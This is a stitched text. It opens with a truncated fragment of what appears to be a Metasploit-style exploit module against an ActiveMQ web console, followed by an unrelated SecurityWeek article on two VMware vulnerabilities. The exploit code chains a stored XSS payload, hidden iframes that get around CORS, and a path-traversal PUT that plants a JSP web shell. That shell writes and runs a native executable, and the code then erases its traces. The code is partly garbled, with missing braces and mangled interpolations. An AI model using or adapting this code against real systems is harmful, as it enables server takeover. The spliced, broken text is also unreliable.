jsp_name = rand_text_alpha(rand(10)+5) + '.jsp'
exe_name = rand_text_alpha(rand(10)+5) + '.exe'

# clean just the jsp, because the exe dropper will be in use
register_files_for_cleanup("../../webapps/admin/#jsp_name")

# our jsp upload, ensuring native code execution
jsp = %Q|<%@ page import="java.io.*" %>
<%
ByteArrayOutputStream buf = new ByteArrayOutputStream();
BufferedReader reader = request.getReader();
int tmp;
while ((tmp = reader.read()) != -1) buf.write(tmp);
FileOutputStream fostream = new FileOutputStream("#exe_name");
buf.writeTo(fostream);
fostream.close();
Runtime.getRuntime().exec("#exe_name");
%>|

# encode the payloads
encoded_exe = encode_js(generate_payload_exe(code: payload.encoded))
encoded_jsp = encode_js(jsp)

# targets
jsp_uri = "http://localhost:8161/fileserver/..%5c%5cadmin%5c%5c#jsp_name"
upload_uri = "http://localhost:8161/admin/#jsp_name"

# this code does the PUT, then uploads/exec native code and then cleans the XSS out :->
js_content = %Q|

function do_put(uri, file_data)
var file_size = file_data.length;
var xhr = new XMLHttpRequest();
xhr.open("PUT", uri, true);
var body = file_data;
xhr.send(body);
return true;

function do_upload(uri, file_data) {
var file_size = file_data.length;
var xhr = new XMLHttpRequest();
xhr.open("POST", uri, true);
var body = file_data;

// latest ff doesnt have sendAsBinary(), so we redefine it
if(!xhr.sendAsBinary)
xhr.sendAsBinary = function(datastr) {
function byteValue(x) {
return x.charCodeAt(0) & 0xff;

var ords = Array.prototype.map.call(datastr, byteValue);
var ui8a = new Uint8Array(ords);
this.send(ui8a.buffer);
}
}
xhr.sendAsBinary(body);
return true;
}

function bye_bye_xss(uri)
var xhr = new XMLHttpRequest();
xhr.open('GET', uri.replace(/\+/g,"%2b"), true);
xhr.send();

function clean_up()
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
if (xhr.readyState == XMLHttpRequest.DONE) {
var els = xhr.responseXML.getElementsByTagName("a");
for (var i = 0, l = els.length; i < l; i++) {
var el = els[i];
if (el.href.search("http://localhost:8161/admin/deleteDestination.action") == 0) {
bye_bye_xss(el.href);

}
}
}
xhr.open('GET', 'http://localhost:8161/admin/queues.jsp', true);
xhr.responseType = "document"; // so that we can parse the reponse as a document
xhr.send(null);
}

function exploit()
do_upload('#{upload_uri', String.fromCharCode(#encoded_exe[0]) + String.fromCharCode(#encoded_exe[1]));
clean_up();
}

function start()
do_put('#{jsp_uri', String.fromCharCode(#encoded_jsp));
setTimeout(exploit(), 2000); // timing is important
}
start();
|

if datastore['OBFUSCATE']
js_content = ::Rex::Exploitation::JSObfu.new(js_content)
js_content.obfuscate
end

print_status("Sending javascript...")
@exploited = true
send_response_html(cli, js_content, 'Content-Type' => 'application/javascript' )
return
end

if datastore['OBFUSCATE']
js_content = ::Rex::Exploitation::JSObfu.new(js_content)
js_content.obfuscate
onlick = ::Rex::Exploitation::JSObfu.new(onlick)
onlick.obfuscate
end

iframe_injection = ""
# done so that we can ensure that we hit our payload, since iframes load very fast, we need a few
(1..20).step(1) do |n|
iframe_injection << "<iframe src=\"http://localhost:8161/admin/queueGraph.jsp\" width=\"0\" height=\"0\"></iframe>"
end

# the stored XSS endpoint
target = "http://localhost:8161/admin/browse.jsp?JMSDestination="

# we use XSS to execute JavaScript code in local context to avoid CORS
xss_injection = "\"+eval(\"var a=document.createElement('script');a.type='text/javascript';"
xss_injection << "a.src='#payload_url';document.body.appendChild(a)\")+\""
target << Rex::Text.uri_encode(xss_injection)

# we can bypass Access-Control-Allow-Origin (CORS) in all browsers using iframe since it makes a GET request
# and the response is recieved in the page (even though we cant access it due to SOP) which then fires the XSS
html_content = %Q|
<html>
<body>
<iframe src="#target" width="0" height="0"></iframe>
#iframe_injection
</body>
</html>
|
print_status("Sending exploit...")
send_response_html(cli, html_content)
handler(cli)
end
end


Exploit Files ≈ Packet Storm

An advisory published by VMware on Thursday describes two important vulnerabilities that affected several of the company’s products.

The first security hole, tracked as CVE-2016-5330, is a DLL hijacking issue in the Windows version of VMware Tools. The flaw can be exploited to execute arbitrary code on the targeted system.

The vulnerability was reported to VMware late last year by Yorick Koster, researcher and co-founder of Dutch security firm Securify. Koster told SecurityWeek that the issue was addressed by the vendor in April, but it was not disclosed until now to give users enough time to patch.

According to Koster, the flaw is related to the VMware Host Guest Client Redirector component of VMware Tools. The component is used for the Shared Folders feature, which allows users to share files between the guest and the host operating system.

The researcher noticed that when a document is opened from a uniform naming convention (UNC) path, the Client Redirector injects a DLL named “vmhgfs.dll” into the application that is used to open the file. Since the DLL was loaded from a relative path, Windows searched for it using the dynamic-link library search order.

This allowed an attacker to place a malicious DLL in a location from where it would likely be loaded before the legitimate file. By getting the Client Redirector to load the malicious DLL into the application, an attacker could have executed arbitrary code with the privileges of the targeted user. An attack could have resulted in the system getting completely compromised.

For the attack to work, the hacker needed to trick the victim into opening any document from the share containing the malicious DLL file. The researcher also believes the attack could have been launched over the Internet if the WebDAV Mini-Redirector was enabled.

Mini-Redirector is a Windows WebDAV client that allows users to access remote shares over the Internet as if they were on the local network. An attacker could have created their own malicious website with WebDAV enabled and use it to host bait documents and the malicious DLL. The vulnerability could have been exploited by luring the victim to the malicious website and getting them to open one of the documents.

Koster said VMware addressed the vulnerability by ensuring that the DLL is loaded from an absolute path. The flaw affects VMware vSphere Hypervisor (ESXi), Workstation Player and Pro, and Fusion.

Another vulnerability disclosed on Thursday by VMware is an HTTP header injection issue affecting vCenter Server and ESXi. The flaw, caused by lack of input validation, allows an attacker to set arbitrary HTTP response headers and cookies, and launch cross-site scripting (XSS) or malicious redirect attacks.

The security hole, tracked as CVE-2016-5331, was reported to VMware independently by several researchers.

Related: VMware Patches Critical Flaw in NSX, vCNS Products

Related: VMware Updates Products to Patch Critical, Important Flaws

view counter

Previous Columns by Eduard Kovacs:

Tags:


SecurityWeek RSS Feed